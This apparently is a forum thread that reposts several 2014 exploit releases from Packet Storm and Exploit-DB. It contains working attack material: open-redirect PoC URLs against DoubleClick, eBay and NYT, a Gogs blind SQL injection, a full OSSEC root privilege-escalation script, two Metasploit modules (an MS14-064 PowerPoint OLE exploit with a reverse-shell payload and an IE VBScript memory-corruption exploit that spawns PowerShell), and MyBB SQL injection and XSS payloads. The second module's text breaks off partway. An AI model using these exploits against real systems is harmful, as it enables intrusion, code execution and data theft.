http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10 *(2.2) Vulnerable URLs Related to DoubleClick.net.* Vulnerable URLs 1: http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml POC: http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/ http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security Vulnerable URLs 2: http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd POC: http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/ http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security Vulnerable URLs 3: http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com% POC: http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/ http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security ... We can see that Google DoubleClick.net has Open Redirect vulnerabilities and could be misused by spammers. *(2.3)* POC Video: https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be *(3) Google DoubleClick.net Can Adversely Affect Other Websites.* At the same time, Google DoubleClick.net can be used to do "Covert Redirect" to other websites, such as Google, eBay, The New York Times, etc.(Bypass other websites' Open Redirect filters) *(3.1)* Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net <http://googleads.g.doubleclick.net/> Vulnerable URL: https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/ POC: https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity More Details: Video: https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be Blog: http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html *(3.2)* eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net <http://googleads.g.doubleclick.net/> Vulnerable URL: http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/ POC: http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security More Details: Video: https://www.youtube.com/watch?v=a4H-u17Y9ks Blog: http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html *(3.3)* The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net Vulnerable URL: http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion POC: http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion More Details: Video: https://www.youtube.com/watch?v=3XtrUqzxNW0 Blog: http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html These vulnerabilities were reported to Google earlier in 2014. But it seems that Google has yet taken any actions. All of the vulnerabilities are still unpatched. Reporter: Wang Jing, Mathematics, Nanyang Technological University http://www.tetraph.com/wangjing More Details: http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/ Source: Google DoubleClick Open Redirect ? Packet Storm
  12. Blind SQL Injection in Gogs label search ======================================== Researcher: Timo Schmid <tschmid@ernw.de> Description =========== Gogs(Go Git Service) is a painless self-hosted Git Service written in Go. (taken from [1]) It is very similiar to the github hosting plattform. Multiple users can create multiple repositories and share code with others with the git version control system. Repositories can be marked as public or private to prevent access from unauthorized users. Gogs provides a view to filter issues by labels. This view is accessible at /<username>/<repository>/issues?labels=&type=&state= The labels Parameter of this view is vulnerable to a blind SQL injection. Exploitation Technique: ======================= Remote Severity Level: =============== Critical CVSS Base Score =============== 6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P) CVE-ID ====== CVE-2014-8681 Impact ====== The vulnerability results at least in a complete compromise of the database. Depending on the particular database configuration a compromise of the system is also possible. Status ====== Fixed by Vendor Vulnerable Code Section ======================= models/issue.go: [...] // GetIssues returns a list of issues by given conditions. func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds, sortType string) ([]Issue, error) { sess := x.Limit(20, (page-1)*20) if rid > 0 { sess.Where("repo_id=?", rid).And("is_closed=?", isClosed) } else { sess.Where("is_closed=?", isClosed) } if uid > 0 { sess.And("assignee_id=?", uid) } else if pid > 0 { sess.And("poster_id=?", pid) } if mid > 0 { sess.And("milestone_id=?", mid) } if len(labelIds) > 0 { for _, label := range strings.Split(labelIds, ",") { sess.And("label_ids like '%$" + label + "|%'") } } [...] The vulnerability exists because of a string concatination in the SQL query with user supplied data. A attacker is restricted to not use commas in the injection string as the program splits input at commas. Proof of Concept ================ Test of version string contains at least 10 characters: http://www.example.com/user/repos/issues?label=' or char_length(@@version) > 10 and '|%'='&type=all&state= Returns all issues if true, non if false. This could be used to extract data with a binary search. Solution ======== This vulnerability could easily be fixed by using prepared statements: sess.And("label_ids like ?", "%$" + label + "|%") Update to Version 0.5.6.1025. Affected Versions ================= >= v0.3.1-9-g49dc57e <= v0.5.6.1024-gf1d8746 Timeline ======== 2014-09-25: Developer informed 2014-10-16: Contact of developer regarding fix 2014-10-25: Working together with developer on fix 2014-10-25: Fixed by ensuring datatype of user input 2014-11-14: CVE-ID assigned Credits ======= Pascal Turbing <pturbing@ernw.de> Jiahua (Joe) Chen <u@gogs.io> References ========== [1] https://github.com/gogits/gogs [2] http://gogs.io/ [3] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/ [4] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/ [5] http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/ [6] https://www.ernw.de/download/BC-1401.txt Advisory-ID =========== BC-1401 Disclaimer ========== The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/ distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. -- Timo Schmid ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192 PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0 Handelsregister Mannheim: HRB 337135 Geschaeftsfuehrer: Enno Rey ============================================================== || Blog: www.insinuator.net | | Conference: www.troopers.de || ============================================================== ================== TROOPERS15 ================== * International IT Security Conference & Workshops * 16th - 20st March 2015 / Heidelberg, Germany * www.troopers.de ==================================================== Source: http://www.exploit-db.com/exploits/35237/
  13. #!/usr/bin/python # Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation # Date: 14-11-14 # Exploit Author: skynet-13 # Vendor Homepage: [url=http://www.ossec.net/]OSSEC | Home | Open Source SECurity[/url] # Software Link: [url]https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz[/url] # Version: OSSEC - 2.8 # Tested on: Ubunutu x86_64 # CVE : 2014-5284 # Created from Research by # Jeff Petersen # Roka Security LLC # [email]jpetersen@rokasecurity.com[/email] # Original info at [url]https://github.com/ossec/ossec-hids/releases/tag/2.8.1[/url] # Run this on target machine and follow instructions to execute command as root from twisted.internet import inotify from twisted.python import filepath from twisted.internet import reactor import os import optparse import signal class HostDenyExploiter(object): def __init__(self, path_to_watch, cmd): self.path = path_to_watch self.notifier = inotify.INotify() self.exploit = cmd def create_files(self): print "==============================================" print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..." for i in range(300, 65536): filename = "/tmp/hosts.deny.%s" % i f = open(filename, 'w') f.write("") f.close() def watch_files(self): print "==============================================" print "Monitoring tmp for file change...." print "ssh into the system a few times with an incorrect password" print "Then wait for up to 10 mins" print "==============================================" self.notifier.startReading() self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change]) def write_exploit_to_file(self, path): print 'Writing exploit to this file' f = open(str(path).split("'")[1], 'w') f.write(' sshd : ALL : twist %s \n' % self.exploit) f.close() print "==============================================" print " ssh in again to execute the command" print "==============================================" print " End Prog." os.kill(os.getpid(), signal.SIGUSR1) def on_file_change(self, watch, path, mask): print 'File: ', str(path).split("'")[1], ' has just been modified' self.notifier.stopReading() self.write_exploit_to_file(path) if __name__ == '__main__': parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n") parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root') (options, args) = parser.parse_args() cmd = options.cmd if options.cmd is None: print parser.usage exit(0) ex = HostDenyExploiter('/tmp', cmd) ex.create_files() ex.watch_files() reactor.run() exit(0) Source: OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation
  14. No offense
  15. This Metasploit module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as those using Office 2010 SP1 may be less stable, and may end up with a crash due to a failure in the CPackage::CreateTempFileName function. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python", 'Description' => %q{ This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as those using Office 2010 SP1 may be less stable, and may end up with a crash due to a failure in the CPackage::CreateTempFileName function. }, 'License' => MSF_LICENSE, 'Author' => [ 'Haifei Li', # Vulnerability discovery and exploit technique 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2014-6352'], ['MSB', 'MS14-064'], ['BID', '70690'], ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm'] ], 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'Targets' => [ ['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}], ], 'Privileged' => false, 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' }, 'DisclosureDate' => "Nov 12 2014", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']) ], self.class) end def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") payload_packager = create_packager('tabnanny.py', payload.encoded) trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10))) zip = zip_ppsx(payload_packager, trigger_packager) file_create(zip) end def zip_ppsx(ole_payload, ole_trigger) zip_data = {} data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template') Dir["#{data_dir}/**/**"].each do |file| unless File.directory?(file) zip_data[file.sub(data_dir,'')] = File.read(file) end end # add the otherwise skipped "hidden" file file = "#{data_dir}/_rels/.rels" zip_data[file.sub(data_dir,'')] = File.read(file) # put our own OLE streams zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger # create the ppsx ppsx = Rex::Zip::Archive.new zip_data.each_pair do |k,v| ppsx.add_file(k,v) end ppsx.pack end def create_packager(file_name, contents) file_info = [2].pack('v') file_info << "#{file_name}\x00" file_info << "#{file_name}\x00" file_info << "\x00\x00" extract_info = [3].pack('v') extract_info << [file_name.length + 1].pack('V') extract_info << "#{file_name}\x00" file = [contents.length].pack('V') file << contents append_info = [file_name.length].pack('V') append_info << Rex::Text.to_unicode(file_name) append_info << [file_name.length].pack('V') append_info << Rex::Text.to_unicode(file_name) append_info << [file_name.length].pack('V') append_info << Rex::Text.to_unicode(file_name) ole_data = file_info + extract_info + file + append_info ole_contents = [ole_data.length].pack('V') + ole_data ole = create_ole("\x01OLE10Native", ole_contents) ole end def create_ole(stream_name, data) ole_tmp = Rex::Quickfile.new('ole') stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) stm = stg.create_stream(stream_name) stm << data stm.close directory = stg.instance_variable_get(:@directory) directory.each_entry do |entry| if entry.instance_variable_get(:@_ab) == 'Root Entry' # 0003000C-0000-0000-c000-000000000046 # Packager clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") entry.instance_variable_set(:@_clsId, clsid) end end # write to disk stg.close ole_contents = File.read(ole_tmp.path) ole_tmp.close ole_tmp.unlink ole_contents end end Surs?: MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python ? Packet Storm
  16. #Title: MyBB 1.8.X - Multiple Vulnerabilities #Date: 13.11.2014 #Tested on: Linux / Apache 2.2 / PHP 5 (localhost) #Vendor: mybb.com #Version: => 1.8.1 - Latest ATM #Contact: smash@devilteam.pl #Author: Smash_ Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on. Sanitize your inputs 1. SQL Injection Vuln: POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1# #1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#): POST /mybb-1.8.1/member.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 408 regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register #1 - Response: HTTP/1.1 503 Service Temporarily Unavailable Date: Thu, 13 Nov 2014 15:16:02 GMT <div id="content"> <h2>MyBB SQL Error</h2> <div id="error"> <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl> <dt>SQL Error:</dt> <dd>1054 - Unknown column '9' in 'order clause'</dd> <dt>Query:</dt> SELECT q.*, s.sid FROM mybb_questionsessions s LEFT JOIN mybb_questions q ON (q.qid=s.qid) WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#' </dd> #2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#): POST /mybb-1.8.1/member.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 409 regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register #2 - Response: HTTP/1.1 200 OK Date: Thu, 13 Nov 2014 15:21:15 GMT (...) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register --> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Forums - Registration</title> #3 - Request (Final POC): POST /mybb-1.8.1/member.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 475 regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register #3 - Response: HTTP/1.1 503 Service Temporarily Unavailable Date: Thu, 13 Nov 2014 15:24:34 GMT (...) <div id="content"> <h2>MyBB SQL Error</h2> <div id="error"> <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl> <dt>SQL Error:</dt> <dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd> <dt>Query:</dt> <dd> SELECT q.*, s.sid FROM mybb_questionsessions s LEFT JOIN mybb_questions q ON (q.qid=s.qid) WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#' </dd> </dl> (...) 2. Cross Site Scripting a) Reflected XSS - Report post Vuln: GET 'type' - XSS"><script>alert(666)</script> localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 Request: GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1 Host: localhost Response: HTTP/1.1 200 OK Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly Content-Length: 1247 Content-Type: text/html <div class="modal"> <div style="overflow-y: auto; max-height: 400px;" class="modal_0"> <form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);"> <input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" /> <input type="hidden" name="action" value="do_report" /> <input type="hidden" name="type" value="XSS"><script>alert(666)</script>" /> <input type="hidden" name="pid" value="0" /> Stored XSS - Signature Vuln: POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video] #1 - Request (change signature): POST /mybb-1.8.1/usercp.php HTTP/1.1 Host: localhost Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig Content-Type: application/x-www-form-urlencoded Content-Length: 203 my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature #2 - Request (user's profile): GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1 Host: localhost Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig #2 - Response: HTTP/1.1 200 OK Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly Content-Length: 12740 Content-Type: text/html; charset=UTF-8 (...) <table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed"> <tr> <td class="thead"><strong>user's Signature</strong></td> </tr> <tr> <td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td> </tr> </table> <br /> c) Reflected XSS - Templates (AP) Vuln: GET 'title' - title"><script>alert(666)</script> localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1 Request: GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1 Host: localhost Response: HTTP/1.1 200 OK (...) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/1"> <title>Editing Template: calendar"><script>alert(666)</script></title> d) Reflected XSS - Languages (AP) Vuln: GET 'file' - <a onmouseover=alert(666)>woot localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit?=english&editwith=&file=<a onmouseover=alert(666)>woot Request: GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit?=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1 Host: localhost Response: HTTP/1.1 200 OK (...) <a href="index.php?module=config-languages">Languages</a> » <a href="index.php?module=config-languages&action=edit?=english">English (American)</a> » <span class="active"><a onmouseover=alert(666)>woot</span> (...) <div class="title"><a onmouseover=alert(666)>woot</div> Surs?: http://www.exploit-db.com/exploits/35224/
  17. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => "Windows OLE Automation Array Remote Code Execution", 'Description' => %q{ This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability. Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10. }, 'License' => MSF_LICENSE, 'Author' => [ 'IBM', # Discovery 'yuange <twitter.com/yuange75>', # PoC 'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit 'Wesley Neelen <security[at]forsec.nl>' #Metasploit ], 'References' => [ [ 'CVE', '2014-6332' ] ], 'Payload' => { 'BadChars' => "\x00", }, 'DefaultOptions' => { 'EXITFUNC' => "none" }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "November 12 2014", 'DefaultTarget' => 0)) end def on_request_uri(cli, request) payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true }) payl.slice! "powershell.exe " html = <<-EOS <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function trigger() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 trigger() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> 